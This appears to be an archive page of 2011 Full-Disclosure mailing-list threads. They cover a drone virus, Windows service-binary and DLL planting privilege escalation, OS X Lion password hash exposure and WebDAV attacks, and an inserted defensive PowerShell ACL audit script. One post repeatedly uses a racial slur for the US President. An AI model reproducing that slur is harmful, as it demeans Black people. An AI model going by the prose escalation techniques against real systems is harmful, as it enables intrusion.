To: Christian Sciberras; full-disclosure; Thor (Hammer of God); Elazar Broad; Michael Schmidt; Michael T
Subject: Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”

On Mon, Oct 10, 2011 at 12:51 PM, Christian Sciberras uuf6...@gmail.com wrote:
> http://www.wired.com/dangerroom/2011/10/virus-hits-drone-fleet/
>
> This is news to me.
>
> Moreover, I'm a bit confused as to how they don't track how it's coming back. I mean, how is it possible that no one stepped in and analyzed how the virus acts and where it came from?
>
> It sounds fishy if you ask me.
>
> Chris.

Locating the storage device infecting the systems, and tracking every military personnel and contractor who has had contact with the drones will take some time. That was the problem with WikiLeaks and Stuxnet, but now new rules are being introduced by the White House to speed up this process.

https://www.nytimes.com/2011/10/07/us/politics/white-house-orders-new-computer-security-rules.html

---
Andrew Wallace
Independent consultant
www.n3td3v.org.uk

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules
No offense intended??? How do you expect to refer to the President of the United States as a nigger and NOT offend people? You crossed WAY over the line on that one, joro. WAY over.

t

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Georgi Guninski
Sent: Thursday, October 06, 2011 10:22 AM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules

risking n3td3v fate, sorry for offtopic.

the nigger said [1] (no offense intended to black people):

"American people understand that not everybody's been following the rules," he said. "These days, a lot of folks doing the right thing are not rewarded. A lot of folks who are not doing the right thing are rewarded."

[1] http://www.cbsnews.com/8301-503544_162-20116707-503544.html

--
joro

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Hashdays, Lucerne?
Hey, who all is going to Hashdays at the end of the month? I'm wondering what kind of attendance we'll see from the FD crowd...

t

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting
Maybe he can trick the user into installing on a FAT32 partition first, and THEN get them to execute from a remote share!

On Sep 25, 2011, at 5:30 PM, Travis Biehn tbi...@gmail.com wrote:

> It might be a fun experiment to see what DLLs they're looking for :.)
>
> -Travis
>
> On Sun, Sep 25, 2011 at 2:57 PM, kz2...@googlemail.com wrote:
>> To replace a service executable you usually need administrator access anyway.
>>
>> --Original Message--
>> From: Madhur Ahuja
>> Sender: full-disclosure-boun...@lists.grok.org.uk
>> To: security-bas...@securityfocus.com
>> To: full-disclosure@lists.grok.org.uk
>> Subject: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting
>> Sent: 25 Sep 2011 19:31
>>
>> Imagine a situation where I have a Windows system with the restricted user access and want to get the Administrator access.
>>
>> There are many services in Windows which run with SYSTEM account. If there exists even one such service whose executable is not protected by Windows File Protection, isn't it possible to execute malicious code (such as gaining Administrator access) simply by replacing the service executable with malicious one and then restarting the service.
>>
>> As a restricted user, what's stopping me from doing this? Is there any integrity check performed by services.msc or service itself before executing with SYSTEM account?
>>
>> Madhur
>>
>> Sent from my POS BlackBerry wireless device, which may wipe itself at any moment
>
> --
> Twitter: https://twitter.com/tbiehn | LinkedIn: http://www.linkedin.com/in/travisbiehn | GitHub: http://github.com/tbiehn | TravisBiehn.com: http://www.travisbiehn.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting
You'd have to be admin to install as a service, and the service would obviously need to then be running as local system to be of benefit (beyond what a normal user could do anyway) AND the installer would have to grant a normal user rights to overwrite it. Certainly possible, but the developer would have to go out of their way to screw that up. And if they did, it still wouldn't be because of the OS...

T

On Sep 25, 2011, at 6:18 PM, Travis Biehn tbi...@gmail.com wrote:

GloW: there's a lot of 3rd party software that installs itself as windows services.

-Travis

On Sun, Sep 25, 2011 at 9:15 PM, GloW - XD doo...@gmail.com wrote:

Haha, too good and too true thor!

Maybe he can trick the user into installing on a FAT32 partition first, and THEN get them to execute from a remote share!

Rofl x10. Agreed, this kind of attack is NOT feasible in 2011, try maybe 2006. Anyhow it has been a pleasure ending this BS, I think, once and for all. Look up how winlogon works for one thing, then look at how windows creates and maintains a service_table, and then at the dlls, which are protected ofc; you cannot touch msgina.dll without A LOT of help from a rootkit or something similar, in which case, why would you need to? You could add an admin, hidden, in a simple bat file script (yes I do have my own code but no it is not for kids..), this is 10 seconds and hidden, so when you have gotten that far, why would you bother to hijack a dll?

You CANNOT do crap without complete ADMIN, not SYSTEM, ADMIN$ share, and total access to all sockets, meaning all pipe control, and that's where half of windows exchanges smb shares for one thing. You guys don't seem to know CRAP about windows to start with, then have the gall to raise such a frigging ridiculous topic about a non happening. YOUTUBE ONE 'real' event of this being useful, or even just working, and I would look, but you won't, cannot, and will never be able to, especially on newer systems of windows 7-8. As I said earlier, enjoy your BS DLL hijacking, but MS don't care for it, and whatever patches they instilled don't touch even service_table.. so they have not given it a high prio, and why should they. This is simply a case of a secteam gaining notoriety, to try and make this a 'big bug!!', to try and gain brownie points from MS. Even tho I don't believe in many things MS, I know windows system, and how to break it, better than many people, and I can tell you now, this whole DLL hijack is a complete and utter waste of your time. But... keep on going, maybe MS will send you another 'thank you' email ;)

xd / http://crazycoders.com / #haxnet@Ef

On 26 September 2011 10:52, Thor (Hammer of God) t...@hammerofgod.com wrote:

Maybe he can trick the user into installing on a FAT32 partition first, and THEN get them to execute from a remote share!

On Sep 25, 2011, at 5:30 PM, Travis Biehn tbi...@gmail.com wrote:

It might be a fun experiment to see what DLLs they're looking for :.)

-Travis

On Sun, Sep 25, 2011 at 2:57 PM, kz2...@googlemail.com wrote:

To replace a service executable you usually need administrator access anyway.

--Original Message--
From: Madhur Ahuja
Sender: full-disclosure-boun...@lists.grok.org.uk
To: security-bas...@securityfocus.com
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting
Sent: 25 Sep 2011 19:31

Imagine a situation where I have a Windows system with restricted user access and want to get Administrator access. There are many services in Windows which run with the SYSTEM account. If there exists even one such service whose executable is not protected by Windows File Protection, isn't it possible to execute malicious code (such as gaining Administrator access) simply by replacing the service executable with a malicious one and then restarting the service? As a restricted user, what's stopping me from doing this? Is there any integrity check performed by services.msc or the service itself before executing with the SYSTEM account?

Madhur
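The thread's answer to Madhur's question is file ACLs: a restricted user can only replace a service binary if the installer granted write rights on it, which is what kz2 and Thor point out. The following PowerShell audit, an added example that is not from the thread or any of its posters, enumerates installed services and reports any binary (or the directory holding it) whose ACL grants write or delete rights to a low-privilege principal; the principal list and rights mask are my own choices for the audit, not something the thread specifies.

```powershell
# Added example, not from the thread: find Windows services whose binary a
# low-privilege user could overwrite. Principal list and rights mask are my
# choices for this audit; adjust them to the local account model. Run elevated.

# Principals that must never hold write/delete rights on a service binary.
$LowPrivPrincipals = @(
    'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE', 'BUILTIN\Guests'
)
# Bits that let a file be rewritten or replaced. Modify and FullControl
# contain them, so those broader grants are caught too. On a directory,
# WriteData means CreateFiles and DeleteSubdirectoriesAndFiles allows
# removing the existing binary so a replacement can be dropped in.
$R = [System.Security.AccessControl.FileSystemRights]
$WriteMask = [int]($R::WriteData -bor $R::AppendData -bor $R::Delete -bor
                   $R::DeleteSubdirectoriesAndFiles)

# Extract the executable from a service's image path, which may be quoted,
# unquoted with spaces, or followed by arguments (e.g. svchost.exe -k netsvcs).
function Get-ServiceBinaryPath {
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    if ($PathName.StartsWith('"')) {
        $end = $PathName.IndexOf('"', 1)
        if ($end -gt 1) { return $PathName.Substring(1, $end - 1) }
    }
    $m = [regex]::Match($PathName, '^(.+?\.exe)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($PathName -split ' ')[0]
}

# Report each service whose binary, or its parent directory, is writable by
# one of the low-privilege principals. Services running as LocalSystem that
# show up here are the case the thread describes.
Get-CimInstance Win32_Service | ForEach-Object {
    $svc = $_
    $exe = Get-ServiceBinaryPath $svc.PathName
    if (-not $exe) { return }
    $exe = [Environment]::ExpandEnvironmentVariables($exe)
    if (-not (Test-Path -LiteralPath $exe)) { return }
    foreach ($target in @($exe, (Split-Path -Parent $exe))) {
        foreach ($ace in (Get-Acl -LiteralPath $target).Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            if (([int]$ace.FileSystemRights -band $WriteMask) -eq 0) { continue }
            [pscustomobject]@{
                Service = $svc.Name; RunsAs = $svc.StartName; Path = $target
                Principal = $ace.IdentityReference.Value; Rights = $ace.FileSystemRights
            }
        }
    }
} | Format-Table -AutoSize
```

An empty result means no service binary is exposed to the principals listed; a hit with RunsAs of LocalSystem is the misconfiguration that, per the thread, only a careless installer would produce.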
[Full-disclosure] FW: Apple Lion OS Suffers From A Major Security Issue
FYI

From: Raging Hagis
Sent: Wednesday, September 21, 2011 7:21 AM
To: Thor (Hammer of God)
Subject: Apple Lion OS Suffers From A Major Security Issue

Apple's Lion OS X stores passwords insecurely, with the updated OS appearing to be more vulnerable than its previous Snow Leopard and Leopard versions, according to a BetaNews report.

Apple's OS X passwords can only be changed by a computer's administrator. The OS encrypts them and then stores them as shadow files on the disk drive in what should be a secure location.

Defence in Depth security blog identified the running issue in 2009, which was evident in versions 10.4, 10.5 and 10.6, and blogged that the issue is still prevalent in Lion. However, it's even easier to steal computer passwords in Lion. In previous versions of OS X, administrator privileges were needed to make the hack work. In Lion, any user can search the directory for the hash file, which is the file needed to decode the encryption.

"It appears in the redesign of OS X Lion's authentication scheme a critical step has been overlooked," Defence in Depth's Patrick Dunstan wrote. Dunstan recognised that users without admin clearance won't be able to access the hash file directory, but it isn't needed when the hash data is accessible from directory services.

The issue would be much worse if the data could be accessed remotely, with hackers easily stealing catalogues of security passwords. Still, the fact the passwords are accessible locally is a big issue for Apple's OS, considering the security prone software is meant to be the world's most advanced desktop operating system according to Apple.

In the meantime, Mac users should disable all guest accounts and automatic login, so the computer requires an admin password at each start up.
Re: [Full-disclosure] Microsoft's Binary Planting Clean-Up Mission
The interesting part about this type of attack is that the attacker can run a webdav server to run the exploit. This is a normal looking url, not some incredibly obvious UNC path to an SMB share. Yes, like most client-side attacks, it may require some social engineering, hijacking of a domain, etc. However, there's more to it than just downloading some random file from a stranger; it can be used in a decent combination by a well-designed attack. A good example is one that ACROS actually reported on (haven't verified myself, so going on their word). Check it out:

Except that you would have to mount the WebDAV point or access it via a WebDAV-aware redirector, right? If you navigate to a file within a WebDAV folder simply with IE via a URL, IIS (or whatever your WebDAV environment is) is going to just feed it to the browser like it would any other file. Now, if you are talking about something like Win 7 NET.EXE's ability to actually map a drive letter or SMB-like resource to a WebDAV folder, that is something else, and you would of course have to get the user to issue a net use command or connect to the WebDAV folder as a network drive. I'm not actually sure the net redirector for webdav would even allow that over an anonymous connection, and even basic auth requires HTTPS of course, which won't work unless the certificates are trusted.

Now if what you are saying is this exploit has merit because you can use WebDAV after getting the user to mount the webdav point first and then get them to execute the file, or get them to issue a net use command against the webdav folder via HTTPS with the target cert being trusted, and after that get them to open the file in question so that you can, in turn, take advantage of the aforementioned conditions to then load the malicious dll via loadlibrary, then I guess I would question how critical of a security vulnerability that is.

I would suggest that if one is actually considering this to be a real issue, one might better consider that all you have to do is get the user to just open up an exe remotely. It's the same thing at the end of the day. Or did I misunderstand the WebDAV configuration you've used?

t